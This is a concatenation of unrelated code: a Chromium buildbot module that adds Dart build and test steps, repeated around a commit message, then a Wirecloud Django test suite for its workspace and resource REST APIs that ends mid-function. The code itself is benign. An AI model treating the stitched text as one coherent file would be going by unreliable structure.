def AddTests(self, options=None, timeout=1200, channel=None):
options = options or {}
name = options.get('name') or ''
is_dart2dart = name.startswith('dart2dart')
is_analyzer = (name.startswith('new_analyzer') or
name.startswith('analyzer_experimental'))
if is_analyzer:
self.AddAnalyzerTests(options, name, timeout)
elif is_dart2dart:
self.AddDart2dartTests(options, timeout)
else:
self.AddVMTests(options, timeout)
def AddAnnotatedSteps(self, python_script, timeout=1200, run=1):
name = 'annotated_steps'
env = dict(self._custom_env)
env['BUILDBOT_ANNOTATED_STEPS_RUN'] = '%d' % run
if run > 1:
name = name + '_run%d' % run
self._factory.addStep(chromium_step.AnnotatedCommand,
name=name,
description=name,
timeout=timeout,
haltOnFailure=False,
env=env,
workdir=self._dart_build_dir,
command=[self._python, python_script],
logfiles=self.logfiles,
lazylogfiles=True)
def AddTrigger(self, trigger):
self._factory.addStep(trigger)
Fix checked mode config when default value is None
We actually add it to the map as None, so we can't just use a default value on get here.
Review URL: https://codereview.chromium.org/248153005
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@265641 0039d316-1c4b-4281-b951-d872f2087c98
#!/usr/bin/python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Set of utilities to add commands to a buildbot factory.
Contains the Dart specific commands. Based on commands.py
"""
from buildbot.steps import shell
from buildbot.process.properties import WithProperties
from master import chromium_step
from master.factory import commands
class DartCommands(commands.FactoryCommands):
"""Encapsulates methods to add dart commands to a buildbot factory."""
logfiles = {
"flakylog": ".flaky.log",
"debuglog": ".debug.log",
"testoutcomelog": ".test-outcome.log",
}
standard_flags = "--write-debug-log --write-test-outcome-log"
def __init__(self, factory=None, target=None, build_dir=None,
target_platform=None, env=None):
commands.FactoryCommands.__init__(self, factory, target, build_dir,
target_platform)
# Two additional directories up compared to normal chromium scripts due
# to using runtime as runtime dir inside dart directory inside
# build directory.
self._script_dir = self.PathJoin('..', self._script_dir)
self._tools_dir = self.PathJoin('tools')
# Where the chromium slave scripts are.
self._chromium_script_dir = self.PathJoin(self._script_dir, 'chromium')
self._private_script_dir = self.PathJoin(self._script_dir, '..', 'private')
self._slave_dir = self.PathJoin(self._script_dir,
'..', '..', '..',
'build', 'scripts',
'slave', 'dart')
self._dart_util = self.PathJoin(self._slave_dir, 'dart_util.py')
self._dart_build_dir = self.PathJoin('build', 'dart')
self._repository_root = ''
self._custom_env = env or {}
def AddMaybeClobberStep(self, clobber, options=None, timeout=1200):
"""Possibly clobber.
Either clobber unconditionally (e.g. nuke-and-pave builder, set at
factory build time), or at runtime (clobber checkbox). If the
former, the clobber arg is set. If the latter, we use a buildbot
Properties object.
TODO(jrg); convert into a doStepIf with a closure referencing
step.build.getProperties(). E.g.
http://permalink.gmane.org/gmane.comp.python.buildbot.devel/6039
"""
options = options or {}
clobber_cmd = [self._python, self._dart_util]
clobber_cmd.append(WithProperties('%(clobber:+--clobber)s'))
workdir = self._dart_build_dir
self._factory.addStep(shell.ShellCommand,
name='maybe clobber',
description='maybe clobber',
timeout=timeout,
haltOnFailure=True,
workdir=workdir,
command=clobber_cmd)
# pylint: disable=W0221
def AddCompileStep(self, options=None, timeout=1200):
options = options or {}
cmd = 'python ' + self._tools_dir + '/build.py --mode=%s' % \
(options['mode'])
workdir = self._dart_build_dir
is_dartc = (options.get('name') != None and
options.get('name').startswith('dartc'))
is_dart2dart = (options.get('name') != None and
options.get('name').startswith('dart2dart'))
is_new_analyzer = (options.get('name') != None and
options.get('name').startswith('new_analyzer'))
is_analyzer_experimental = (options.get('name') != None and
options.get('name')
.startswith('analyzer_experimental'))
is_vm = not (is_dartc or is_dart2dart or is_new_analyzer or
is_analyzer_experimental)
if is_vm:
cmd += ' --arch=%s' % (options['arch'])
cmd += ' runtime'
elif is_dart2dart:
cmd += ' dart2dart_bot'
elif is_dartc and options['mode'] == 'debug':
# For dartc we always do a full build, except for debug mode
# where we will time out doing api docs.
cmd += ' dartc_bot'
else:
# We don't specify a specific target (i.e. we build the all target)
pass
self._factory.addStep(shell.ShellCommand,
name='build',
description='build',
timeout=timeout,
env = self._custom_env,
haltOnFailure=True,
workdir=workdir,
command=cmd)
def AddKillStep(self, step_name='Kill leftover process'):
cmd = 'python ' + self._tools_dir + '/task_kill.py --kill_browsers=True'
self._factory.addStep(shell.ShellCommand,
name='Taskkill',
description=step_name,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd)
def AddArchiveCoredumps(self, options=None, step_name='Archive coredumps'):
options = options or {}
if (options.get('name') != None and
options.get('name').startswith('vm')):
cmd = 'python ' + self._tools_dir + '/archive_crash.py'
self._factory.addStep(shell.ShellCommand,
name='ArchiveCore',
description=step_name,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd)
def AddAnalyzerTests(self, options, name, timeout):
compiler = 'dartanalyzer'
if name.startswith('analyzer_experimental'):
compiler = 'dart2analyzer'
cmd = ('python ' + self._tools_dir + '/test.py '
' --progress=line --report --time --mode=%s --arch=%s '
' --compiler=%s --runtime=none --failure-summary %s'
) % (options['mode'], options['arch'], compiler,
self.standard_flags)
self._factory.addStep(shell.ShellCommand,
name='tests',
description='tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
def AddDart2dartTests(self, options, timeout):
shards = options.get('shards') or 1
shard = options.get('shard') or 1
cmd = ('python ' + self._tools_dir + '/test.py '
' --progress=buildbot --report --time --mode=%s --arch=%s '
' --compiler=dart2dart --shards=%s --shard=%s %s'
) % (options['mode'], options['arch'], shards, shard,
self.standard_flags)
self._factory.addStep(shell.ShellCommand,
name='tests',
description='tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
cmd += ' --minified'
self._factory.addStep(shell.ShellCommand,
name='minified tests',
description='minified tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
def AddVMTests(self, options, timeout):
cmd = ('python ' + self._tools_dir + '/test.py '
' --progress=line --report --time --mode=%s --arch=%s '
'--compiler=none --runtime=vm --failure-summary %s '
'--copy-coredumps'
) % (options['mode'], options['arch'], self.standard_flags)
vm_options = options.get('vm_options')
if vm_options:
cmd += ' --vm-options=%s' % vm_options
if options.get('flags') != None:
cmd += options.get('flags')
checked_config = options.get('checked_config')
if not checked_config:
checked_config = 'both'
if checked_config == 'unchecked' or checked_config == 'both':
self._factory.addStep(shell.ShellCommand,
name='tests',
description='tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
if checked_config == 'checked' or checked_config == 'both':
cmd += ' --checked'
self._factory.addStep(shell.ShellCommand,
name='checked_tests',
description='checked_tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
def AddTests(self, options=None, timeout=1200, channel=None):
options = options or {}
name = options.get('name') or ''
is_dart2dart = name.startswith('dart2dart')
is_analyzer = (name.startswith('new_analyzer') or
name.startswith('analyzer_experimental'))
if is_analyzer:
self.AddAnalyzerTests(options, name, timeout)
elif is_dart2dart:
self.AddDart2dartTests(options, timeout)
else:
self.AddVMTests(options, timeout)
def AddAnnotatedSteps(self, python_script, timeout=1200, run=1):
name = 'annotated_steps'
env = dict(self._custom_env)
env['BUILDBOT_ANNOTATED_STEPS_RUN'] = '%d' % run
if run > 1:
name = name + '_run%d' % run
self._factory.addStep(chromium_step.AnnotatedCommand,
name=name,
description=name,
timeout=timeout,
haltOnFailure=False,
env=env,
workdir=self._dart_build_dir,
command=[self._python, python_script],
logfiles=self.logfiles,
lazylogfiles=True)
def AddTrigger(self, trigger):
self._factory.addStep(trigger)
|
# -*- coding: utf-8 -*-
# Copyright 2013 Universidad Politécnica de Madrid
# This file is part of Wirecloud.
# Wirecloud is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Wirecloud is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Wirecloud. If not, see <http://www.gnu.org/licenses/>.
import os
from tempfile import mkdtemp
import shutil
from django.core.urlresolvers import reverse
from django.test import Client
from django.utils import simplejson
from wirecloud.catalogue import utils as catalogue
from wirecloud.catalogue.models import CatalogueResource
import wirecloud.commons.test
from wirecloud.commons.test import LocalDownloader, WirecloudTestCase
from wirecloud.commons.utils import downloader
from wirecloud.commons.utils.wgt import WgtDeployer
from wirecloud.platform.models import IWidget, Tab, VariableValue, Workspace
from wirecloud.platform.widget import utils as showcase
# Avoid nose to repeat these tests (they are run through wirecloud/platform/tests/__init__.py)
__test__ = False
class ApplicationMashupAPI(WirecloudTestCase):
fixtures = ('selenium_test_data', 'user_with_workspaces')
tags = ('rest_api')
@classmethod
def setUpClass(cls):
super(ApplicationMashupAPI, cls).setUpClass()
cls.client = Client()
cls._original_download_function = staticmethod(downloader.download_http_content)
downloader.download_http_content = LocalDownloader({
'http': {
'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
},
})
@classmethod
def tearDownClass(cls):
downloader.download_http_content = cls._original_download_function
def test_features(self):
url = reverse('wirecloud.features')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_collection')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_workspace_collection_read(self):
url = reverse('wirecloud.workspace_collection')
self.client.login(username='admin', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, list))
self.assertTrue(isinstance(response_data[0], dict))
def test_workspace_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_collection')
data = {
'name': 'test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not created
self.assertFalse(Workspace.objects.filter(name='test').exists())
# Check using Accept: text/html
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_collection_post(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
data = {
'name': 'test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'test')
self.assertTrue(isinstance(response_data['wiring'], dict))
# Workspace should be created
self.assertTrue(Workspace.objects.filter(creator=1, name='test').exists())
def test_workspace_collection_post_conflict(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'ExistingWorkspace',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 409)
def test_workspace_collection_post_creation_from_nonexistent_mashup(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/nonexistent-mashup/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
def test_workspace_collection_post_creation_from_mashup(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/test-mashup/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'Test Mashup')
self.assertTrue(isinstance(response_data['wiring'], dict))
# Workspace should be created
self.assertTrue(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_collection_post_creation_from_mashup_missing_dependencies(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/test-mashup-dependencies/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('description' in response_data)
self.assertTrue('details' in response_data)
self.assertTrue('missingDependencies' in response_data['details'])
self.assertEqual(set(response_data['details']['missingDependencies']), set((
'Wirecloud/nonavailable-operator/1.0',
'Wirecloud/nonavailable-widget/1.0',
)))
# Workspace should not be created
self.assertFalse(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_entry_read_requires_authentication(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not deleted
self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_read(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
# Response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'ExistingWorkspace')
self.assertEqual(response_data['creator'], 'user_with_workspaces')
self.assertTrue('wiring' in response_data)
self.assertTrue('tabs' in response_data)
self.assertTrue(isinstance(response_data['tabs'], list))
self.assertTrue(len(response_data['tabs']) > 0)
self.assertTrue(isinstance(response_data['tabs'][0], dict))
self.assertTrue('id' in response_data['tabs'][0])
self.assertTrue('name' in response_data['tabs'][0])
self.assertTrue('preferences' in response_data['tabs'][0])
self.assertTrue(isinstance(response_data['tabs'][0]['preferences'], dict))
self.assertTrue('iwidgets' in response_data['tabs'][0])
self.assertTrue(isinstance(response_data['tabs'][0]['iwidgets'], list))
self.assertTrue('preferences' in response_data)
self.assertTrue(isinstance(response_data['preferences'], dict))
def test_workspace_entry_delete_requires_authentication(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not deleted
self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_delete(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Workspace should be removed
self.assertFalse(Workspace.objects.filter(name='ExistingWorkspace').exists())
def test_workspace_wiring_entry_put_requires_authentication(self):
url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})
workspace = Workspace.objects.get(id=1)
old_wiring_status = simplejson.loads(workspace.wiringStatus)
data = simplejson.dumps({
'operators': [{'name': 'Operator1'}],
'connections': [],
})
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace wiring status should not have change
workspace = Workspace.objects.get(id=1)
wiring_status = simplejson.loads(workspace.wiringStatus)
self.assertEqual(wiring_status, old_wiring_status)
# Check using Accept: text/html
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_wiring_entry_put(self):
url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})
new_wiring_status = {
'operators': [{'name': 'Operator1'}],
'connections': [],
}
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = simplejson.dumps(new_wiring_status)
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Workspace wiring status should have change
workspace = Workspace.objects.get(id=1)
wiring_status = simplejson.loads(workspace.wiringStatus)
self.assertEqual(wiring_status, new_wiring_status)
def test_tab_collection_post_requires_authentication(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
data = {
'name': 'rest_api_test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Tab should be not created
self.assertFalse(Tab.objects.filter(name='rest_api_test').exists())
# Check using Accept: text/html
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_tab_collection_post(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'rest_api_test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertEqual(response_data['name'], 'rest_api_test')
# Tab should be created
self.assertTrue(Tab.objects.filter(name='rest_api_test').exists())
def test_tab_collection_post_conflict(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'ExistingTab',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 409)
def test_tab_entry_delete_requires_authentication(self):
url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Tab should be not deleted
self.assertTrue(Tab.objects.filter(name='ExistingTab').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_tab_entry_delete(self):
url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Tab should be removed
self.assertFalse(Tab.objects.filter(name='ExistingTab').exists())
def test_iwidget_collection_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})
# Make the request
data = {
'widget': 'Wirecloud/Test/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should be not created
# TODO
def test_iwidget_collection_post(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'widget': 'Wirecloud/Test/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_iwidget_entry_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
data = {
'name': 'New Name',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should be not updated
iwidget = IWidget.objects.get(pk=2)
self.assertNotEqual(iwidget.name, 'New Name')
def test_iwidget_entry_post(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'New Name',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# Check that the iwidget name has been changed
iwidget = IWidget.objects.get(pk=2)
self.assertEqual(iwidget.name, 'New Name')
def test_iwidget_preferences_entry_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
data = {
'text': 'new value',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget preferences should not be updated
variable_value = VariableValue.objects.get(
user__username='user_with_workspaces',
variable__vardef__name='text',
variable__iwidget__id=2
)
self.assertNotEqual(variable_value.value, 'new value')
def test_iwidget_preferences_entry_post(self):
url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'text': 'new value',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# IWidget preferences should be updated
variable_value = VariableValue.objects.get(
user__username='user_with_workspaces',
variable__vardef__name='text',
variable__iwidget__id=2
)
self.assertEqual(variable_value.value, 'new value')
def test_iwidget_entry_delete_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should not be deleted
IWidget.objects.get(pk=2)
def test_iwidget_entry_delete(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# IWidget should be deleted
self.assertRaises(IWidget.DoesNotExist, IWidget.objects.get, pk=2)
class ResourceManagementAPI(WirecloudTestCase):
fixtures = ('selenium_test_data',)
tags = ('rest_api')
@classmethod
def setUpClass(cls):
super(ResourceManagementAPI, cls).setUpClass()
cls.client = Client()
cls._original_download_function = staticmethod(downloader.download_http_content)
downloader.download_http_content = LocalDownloader({
'http': {
'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
},
})
# catalogue deployer
cls.old_catalogue_deployer = catalogue.wgt_deployer
cls.catalogue_tmp_dir = mkdtemp()
catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)
# showcase deployer
cls.old_deployer = showcase.wgt_deployer
cls.showcase_tmp_dir = mkdtemp()
showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)
@classmethod
def tearDownClass(cls):
downloader.download_http_content = cls._original_download_function
# deployers
catalogue.wgt_deployer = cls.old_catalogue_deployer
shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
showcase.wgt_deployer = cls.old_deployer
shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)
super(ResourceManagementAPI, cls).tearDownClass()
def test_resource_collection_read_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_collection')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_collection_read(self):
url = reverse('wirecloud_showcase.resource_collection')
self.client.login(username='admin', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
for resource_id in response_data:
resource = response_data[resource_id]
self.assertTrue(isinstance(resource, dict))
self.assertIn('type', resource)
self.assertIn(resource['type'], CatalogueResource.RESOURCE_TYPES)
self.assertIn('vendor', resource)
self.assertIn('name', resource)
self.assertIn('version', resource)
def test_resource_collection_post_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_collection')
response = self.client.post(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_collection_post(self):
url = reverse('wirecloud_showcase.resource_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
response = self.client.post(url, data={'file': f}, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertIn('type', response_data)
self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
self.assertIn('vendor', response_data)
self.assertIn('name', response_data)
self.assertIn('version', response_data)
def test_resource_collection_post_using_octet_stream(self):
url = reverse('wirecloud_showcase.resource_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
response = self.client.post(url, f.read(), content_type="application/octet-stream", HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertIn('type', response_data)
self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
self.assertIn('vendor', response_data)
self.assertIn('name', response_data)
self.assertIn('version', response_data)
def test_resource_collection_post_using_octet_stream_error(self):
url = reverse('wirecloud_showcase.resource_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
response = self.client.post(url, 'invalid content', content_type="application/octet-stream", HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
def test_resource_entry_read_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_entry_read(self):
resource_id = [
'Wirecloud',
'Test',
'1.0'
]
url = reverse('wirecloud_showcase.resource_entry', args=resource_id)
file_name = '_'.join(resource_id) + '.wgt'
local_dir = catalogue.wgt_deployer.get_base_dir(*resource_id)
dst_file = os.path.join(local_dir, file_name)
if not os.path.exists(local_dir):
os.makedirs(local_dir)
src_file = os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt')
shutil.copy(src_file, dst_file)
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
def test_resource_entry_delete_requires_authentication(self):
